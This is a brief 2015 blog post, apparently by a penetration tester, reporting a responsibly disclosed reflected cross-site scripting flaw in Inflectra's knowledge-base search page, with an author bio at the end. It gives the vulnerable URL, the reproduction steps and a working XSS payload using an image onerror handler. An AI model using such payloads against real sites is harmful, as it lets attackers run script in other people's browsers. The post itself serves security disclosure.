Pentest Space: Inflectra Security Hall of fame

Sunday 4 October 2015

Inflectra Security Hall of fame

Vulnerability: Reflected Cross Site Scripting XSS
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx

Steps:

1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx

2. Input following payload script to search box

"><img src=: '"><img src=a onerror=prompt(document.domain);>

Inflectra Team acknowledged me for disclosing security issues to them.

Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx

About Me

Ye Yint aka r0lan has always had a strong fascination with InfoSec. He is one bit of YEHG core team and also a former technical team member of mmCERT. He has participated in responsible disclosure programs and attained some Hall of Fames and CVEs. Currently, he has obtained OSCE, eCPTX, AWAE, OSCP, OSWP, CREST CRT and CPSA and has occasionally contributed back to the community such as BSides Myanmar and Myanmar Cyber Security Challenge CTF competition as one of the organisers.
Linkedin , Github , Twitter